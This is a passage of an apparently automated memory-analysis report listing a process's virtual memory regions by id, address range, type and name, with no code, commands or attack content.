0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 5023 start_va = 0x84b1130000 end_va = 0x84b1150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 5024 start_va = 0x84b1100000 end_va = 0x84b1120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 5029 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5030 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5031 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 5032 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 5033 start_va = 0x84b1130000 end_va = 0x84b1150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 5034 start_va = 0x84b1100000 end_va = 0x84b1120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 5048 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5049 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5050 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 5051 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 5052 start_va = 0x84b1130000 end_va = 0x84b1150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 5053 start_va = 0x84b1100000 end_va = 0x84b1120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 5054 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5055 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5056 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 5057 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 5058 start_va = 0x84b1130000 end_va = 0x84b1150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 5059 start_va = 0x84b1100000 end_va = 0x84b1120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 5060 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5061 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5062 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 5063 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 5064 start_va = 0x84b1130000 end_va = 0x84b114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 5065 start_va = 0x84b1100000 end_va = 0x84b111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 5066 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5067 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5068 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 5069 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 5070 start_va = 0x84b1130000 end_va = 0x84b114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 5071 start_va = 0x84b1100000 end_va = 0x84b111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 5072 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5073 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5074 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 5075 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 5076 start_va = 0x84b1130000 end_va = 0x84b114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 5077 start_va = 0x84b1100000 end_va = 0x84b111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 5087 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5088 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5089 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 5090 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 5091 start_va = 0x84b1130000 end_va = 0x84b114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 5092 start_va = 0x84b1100000 end_va = 0x84b111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 5097 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5098 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5099 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 5100 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 5101 start_va = 0x84b1130000 end_va = 0x84b114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 5102 start_va = 0x84b1100000 end_va = 0x84b111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 5103 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5104 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5105 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 5106 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 5107 start_va = 0x84b1130000 end_va = 0x84b114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 5108 start_va = 0x84b1100000 end_va = 0x84b111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 5118 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5119 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5120 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 5121 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 5122 start_va = 0x84b1130000 end_va = 0x84b114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 5123 start_va = 0x84b1100000 end_va = 0x84b111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 5137 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5138 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5139 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 5140 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 5141 start_va = 0x84b1130000 end_va = 0x84b114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 5142 start_va = 0x84b1100000 end_va = 0x84b111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 5147 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5148 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5149 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 5150 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 5151 start_va = 0x84b1130000 end_va = 0x84b114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 5152 start_va = 0x84b1100000 end_va = 0x84b111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 5162 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5167 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5190 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5191 start_va = 0x84b2e20000 end_va = 0x84b2f30fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5196 start_va = 0x84b2e20000 end_va = 0x84b2f24fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5601 start_va = 0x84b2e20000 end_va = 0x84b2f29fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5606 start_va = 0x84b2e20000 end_va = 0x84b2f30fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5646 start_va = 0x84b2e20000 end_va = 0x84b2f2cfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5647 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5648 start_va = 0x84b2e20000 end_va = 0x84b2f22fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5668 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5685 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5686 start_va = 0x84b2e20000 end_va = 0x84b2f2ffff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5691 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5692 start_va = 0x84b2e20000 end_va = 0x84b2f22fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5693 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5694 start_va = 0x84b2e20000 end_va = 0x84b2f28fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5695 start_va = 0x84b2e20000 end_va = 0x84b2f29fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5696 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5697 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5698 start_va = 0x84b2e20000 end_va = 0x84b2f2cfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5699 start_va = 0x84b2e20000 end_va = 0x84b2f22fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5700 start_va = 0x84b2e20000 end_va = 0x84b2f2ffff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5701 start_va = 0x84b2e20000 end_va = 0x84b2f2cfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5702 start_va = 0x84b2e20000 end_va = 0x84b2f2afff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5703 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5704 start_va = 0x84b2e20000 end_va = 0x84b2f22fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5705 start_va = 0x84b2e20000 end_va = 0x84b2f30fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5706 start_va = 0x84b2e20000 end_va = 0x84b2f22fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5707 start_va = 0x84b2e20000 end_va = 0x84b2f2cfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5708 start_va = 0x84b2e20000 end_va = 0x84b2f24fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5709 start_va = 0x84b2f30000 end_va = 0x84b302ffff entry_point = 0x0 region_type = private name = "private_0x00000084b2f30000" filename = "" Region: id = 5710 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5711 start_va = 0x84b2e20000 end_va = 0x84b2f2afff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5712 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5713 start_va = 0x84b2e20000 end_va = 0x84b2f26fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5714 start_va = 0x84b2e20000 end_va = 0x84b2f2dfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5715 start_va = 0x84b2e20000 end_va = 0x84b2f29fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5716 start_va = 0x84b2e20000 end_va = 0x84b2f27fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5717 start_va = 0x84b3030000 end_va = 0x84b3140fff entry_point = 0x0 region_type = private name = "private_0x00000084b3030000" filename = "" Region: id = 5718 start_va = 0x84b2e20000 end_va = 0x84b2f29fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5719 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5720 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5721 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5722 start_va = 0x84b2e20000 end_va = 0x84b2f22fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5723 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5724 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5725 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5726 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5727 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5728 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5729 start_va = 0x84b2e20000 end_va = 0x84b2f26fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5730 start_va = 0x84b3030000 end_va = 0x84b3140fff entry_point = 0x0 region_type = private name = "private_0x00000084b3030000" filename = "" Region: id = 5731 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5732 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5733 start_va = 0x84b3030000 end_va = 0x84b3140fff entry_point = 0x0 region_type = private name = "private_0x00000084b3030000" filename = "" Region: id = 5734 start_va = 0x84b2e20000 end_va = 0x84b2f26fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5735 start_va = 0x84b2e20000 end_va = 0x84b2f26fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5736 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5737 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5738 start_va = 0x84b2e20000 end_va = 0x84b2f2dfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5739 start_va = 0x84b3030000 end_va = 0x84b3140fff entry_point = 0x0 region_type = private name = "private_0x00000084b3030000" filename = "" Region: id = 5740 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5741 start_va = 0x84b2e20000 end_va = 0x84b2f27fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5742 start_va = 0x84b3030000 end_va = 0x84b3140fff entry_point = 0x0 region_type = private name = "private_0x00000084b3030000" filename = "" Region: id = 5743 start_va = 0x84b2e20000 end_va = 0x84b2f28fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5744 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5745 start_va = 0x84b2e20000 end_va = 0x84b2f2cfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5746 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5747 start_va = 0x84b2e20000 end_va = 0x84b2f26fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5748 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5749 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5750 start_va = 0x84b2e20000 end_va = 0x84b2f2afff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5751 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5752 start_va = 0x84b2e20000 end_va = 0x84b2f2cfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5753 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5754 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5755 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5756 start_va = 0x84b2e20000 end_va = 0x84b2f2dfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5757 start_va = 0x84b2e20000 end_va = 0x84b2f2afff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5758 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5759 start_va = 0x84b2e20000 end_va = 0x84b2f2cfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5760 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5761 start_va = 0x84b2e20000 end_va = 0x84b2f26fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5762 start_va = 0x84b2e20000 end_va = 0x84b2f2ffff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5763 start_va = 0x84b2e20000 end_va = 0x84b2f2ffff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5764 start_va = 0x84b2e20000 end_va = 0x84b2f2afff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5765 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5766 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5767 start_va = 0x84b2e20000 end_va = 0x84b2f26fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5768 start_va = 0x84b2e20000 end_va = 0x84b2f2afff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5769 start_va = 0x84b2e20000 end_va = 0x84b2f27fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5770 start_va = 0x84b2e20000 end_va = 0x84b2f2cfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5771 start_va = 0x84b2e20000 end_va = 0x84b2f26fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5772 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5773 start_va = 0x84b2e20000 end_va = 0x84b2f2dfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5774 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5775 start_va = 0x84b2e20000 end_va = 0x84b2f29fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5776 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5777 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5778 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5779 start_va = 0x84b2e20000 end_va = 0x84b2f28fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5780 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5781 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5782 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5783 start_va = 0x84b2e20000 end_va = 0x84b2f29fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5784 start_va = 0x84b2e20000 end_va = 0x84b2f22fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5785 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5786 start_va = 0x84b2e20000 end_va = 0x84b2f2afff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5787 start_va = 0x84b2e20000 end_va = 0x84b2f27fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5788 start_va = 0x84b2e20000 end_va = 0x84b2f2ffff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5789 start_va = 0x84b2e20000 end_va = 0x84b2f2ffff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5790 start_va = 0x84b2e20000 end_va = 0x84b2f24fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5791 start_va = 0x84b2e20000 end_va = 0x84b2f2dfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5792 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5793 start_va = 0x84b2e20000 end_va = 0x84b2f2cfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5794 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5795 start_va = 0x84b3030000 end_va = 0x84b3140fff entry_point = 0x0 region_type = private name = "private_0x00000084b3030000" filename = "" Region: id = 5796 start_va = 0x84b2e20000 end_va = 0x84b2f2afff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5797 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5798 start_va = 0x84b2e20000 end_va = 0x84b2f24fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5799 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5800 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5801 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5802 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5803 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5804 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = 